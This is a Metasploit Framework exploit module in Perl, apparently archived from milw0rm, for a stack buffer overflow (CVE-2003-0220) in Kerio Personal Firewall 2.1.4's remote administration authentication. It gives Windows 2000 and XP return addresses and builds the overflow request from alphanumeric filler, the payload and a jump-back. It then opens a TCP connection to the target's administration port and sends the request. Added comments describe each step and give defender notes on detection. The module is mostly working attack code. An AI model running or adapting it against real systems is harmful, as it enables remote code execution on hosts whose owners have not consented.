
Kerio Personal Firewall 2.1.4 Remote Authentication Packet Overflow


     1    ##
     2    # This file is part of the Metasploit Framework and may be redistributed
     3    # according to the licenses defined in the Authors field below. In the
     4    # case of an unknown or missing license, this file defaults to the same
     5    # license as the core Framework (dual GPLv2 and Artistic). The latest
     6    # version of the Framework can always be obtained from metasploit.com.
     7    ##
     8
     9    package Msf::Exploit::kerio_auth;
     10   use base "Msf::Exploit";
     11   use strict;
     12   use Pex::Text;
     13
     #    No advanced options are defined; this empty hash is handed to the
     #    parent constructor by new() further down.
     14   my $advanced = { };
     15
     #    Module metadata passed to the parent class by new(): affected product,
     #    user-settable options, payload constraints, references and targets.
     #    NOTE(review): the quote and minus characters in this listing are
     #    typographic substitutes (U+2019, U+2212) left by the document
     #    renderer, and the leading numbers are its line gutter.
     16   my $info =
     17     {
     18
     19          ’Name’ => ’Kerio Personal Firewall 2 (2.1.4) Remote Authentication Packet Buffer Overflow’,
     20          ’Version’ => ’$Revision: 1.1 $’,
     21          ’Authors’ => [ ’y0 [at] w00t−shell.net’, ],
     22          ’Arch’ => [ ’x86’ ],
     23          ’OS’      => [ ’win32’, ’win2000’, ’winxp’, ],
     24          ’Priv’ => 0,
     #    Options that Exploit() reads back through GetVar. Each entry looks
     #    like [required flag, type, help text, optional default] -- confirm
     #    against the framework. RPORT defaults to 44334, presumably the port
     #    of the administration service named in the Description (check the
     #    advisory in Refs). Defender note: that port should not be reachable
     #    from untrusted networks.
     25          ’UserOpts’ => {
     26                    ’RHOST’ => [1, ’ADDR’, ’The target address’],
     27                    ’RPORT’ => [1, ’PORT’, ’The target port’, 44334],
     28                    ’SSL’     => [0, ’BOOL’, ’Use SSL’],
     29            },
     30          ’AutoOpts’ => { ’EXITFUNC’ => ’process’ },
     #    Constraints handed to the framework's payload encoder. By their
     #    names, Space caps the payload size and BadChars lists bytes that must
     #    not appear in it; the exact semantics are defined by the framework
     #    and are not shown here.
     31          ’Payload’ => {
     32                    ’Space’       => 1000,
     33                    ’BadChars’ => "\x00",
     34                    ’Prepend’    => "\x81\xc4\x54\xf2\xff\xff",
     35                    ’Keys’        => [’−ws2ord’],
     36            },
     37
     38           ’Description’ => Pex::Text::Freeform(qq{
     39           This module exploits a stack overflow in Kerio Personal Firewall
     40   administration authentication process. This module has only been tested
     41   against Kerio Personal Firewall 2 2.1.4.
     42   }),
     43
     #    Public identifiers for the flaw (Bugtraq ID, CVE, original advisory).
     #    They are the starting point for checking whether an installed
     #    version is affected and which release fixes it.
     44           ’Refs’   => [
     45                     [’BID’, ’7180’],
     46                     [’CVE’, ’2003−0220’],
     47                     [’URL’, ’http://www1.corest.com/common/showdoc.php?idx=314&idxseccion=10’],
     48             ],
     49
     #    One entry per supported OS label. Exploit() packs the second element
     #    of the selected entry as a 32-bit little-endian value (pack 'V')
     #    into the request it sends.
     50          ’Targets’ => [
     51                    [’Windows 2000 Pro SP4 English’, 0x7c2ec68b],
     52                    [’Windows XP Pro SP0 English’,    0x77e3171b],
     #    NOTE(review): the next two lines are a page footer and header from
     #    the document renderer, not part of the module.
y0                                                                                                             02/28/2006
                         Kerio Personal Firewall 2.1.4 Remote Authentication Packet Overflow                           Page 2/3
     53                       [’Windows XP Pro SP1 English’,    0x77dc5527],
     54                  ],
     55
     56             ’Keys’ => [’firewall’],
     57
     58             ’DisclosureDate’ => ’Apr 28 2003’,
     59
     60        };
     61
     #    Constructor. Passes the file-scoped $info and $advanced hashes,
     #    followed by any caller arguments, to the parent class constructor
     #    and returns the object it produces.
     62    sub new {
     63            my $class = shift;
     64            my $self = $class−>SUPER::new({’Info’ => $info, ’Advanced’ => $advanced}, @_);
     65            return($self);
     66    }
     67
     #    Builds one request and sends it to RHOST:RPORT over TCP.
     #    Steps visible below: read the options and the encoded payload,
     #    initialise the nop module, assemble the request, connect, send,
     #    hand the socket to Handler(), close. Every path returns nothing.
     #    Defender note: the request goes out in a single Send() right after
     #    the connection is made, with nothing read from the server first.
     #    Assuming AlphaNumText(4268) yields 4268 characters, it is at least
     #    4268 + 4 + 5 bytes plus the payload. An unsolicited multi-kilobyte
     #    first packet to the administration port is therefore the on-wire
     #    observable. The Description names 2.1.4 as the only tested version;
     #    the advisory listed in Refs is the place to confirm the fixed release.
     68    sub Exploit
     69    {
     70            my    $self = shift;
     71            my    $target_host = $self−>GetVar(’RHOST’);
     72            my    $target_port = $self−>GetVar(’RPORT’);
     73            my    $target_idx = $self−>GetVar(’TARGET’);
     74            my    $shellcode   = $self−>GetVar(’EncodedPayload’)−>Payload;
     75            my    $target = $self−>Targets−>[$target_idx];
     76
     #    Stop early if the framework cannot set up its nop module. Nothing
     #    else in this sub refers to the nops.
     77             if (! $self−>InitNops(128)) {
     78                     $self−>PrintLine("[*] Failed to initialize the nop module.");
     79                     return;
     80             }
     81
     #    Request layout, in order: AlphaNumText(4268) filler, the encoded
     #    payload, the selected target's 32-bit value (little-endian), then
     #    five fixed bytes.
     82             my $sploit =
     83               Pex::Text::AlphaNumText(4268). $shellcode.
     84               pack(’V’, $target−>[1]). "\xe9\x0b\xfe\xff\xff";
     85
     86             $self−>PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target−>[0], $target−>[1]));
     87
     #    Outbound TCP connection. The local port comes from CPORT and the
     #    SSL option is passed straight through to the socket class.
     88             my $s = Msf::Socket::Tcp−>new
     89               (
     90                     ’PeerAddr’ => $target_host,
     91                     ’PeerPort’ => $target_port,
     92                     ’LocalPort’ => $self−>GetVar(’CPORT’),
     93                     ’SSL’         => $self−>GetVar(’SSL’),
     94               );
     #    A connection failure is reported and the run ends without sending.
     95             if ($s−>IsError) {
     96                     $self−>PrintLine(’[*] Error creating socket: ’ . $s−>GetError);
     97                     return;
     98             }
     99
     #    Handler() is a framework method not shown here; the socket is
     #    closed once it returns.
     100            $s−>Send($sploit);
     101            $self−>Handler($s);
     102            $s−>Close();
     103            return;
     104   }
     105
     106   1;
     107
     108   # milw0rm.com [2006−02−28]



